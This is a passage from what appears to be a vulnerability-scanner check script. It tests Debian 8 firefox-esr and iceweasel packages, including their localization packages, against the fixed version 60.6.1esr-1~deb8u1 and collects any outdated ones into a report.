res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-bd\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cak\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-za\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += 
res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n 
report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ia\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ka\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kab\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report 
+= res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mai\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ml\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-my\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ne-np\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-oc\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-or\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += 
res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += 
res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ur\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-dbg\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-dev\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = 
isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cak\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", 
ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", 
ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ia\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ka\", ver:\"60.6.1esr-1~deb8u1\", 
rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kab\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-my\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ne-np\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += 
res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-oc\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", 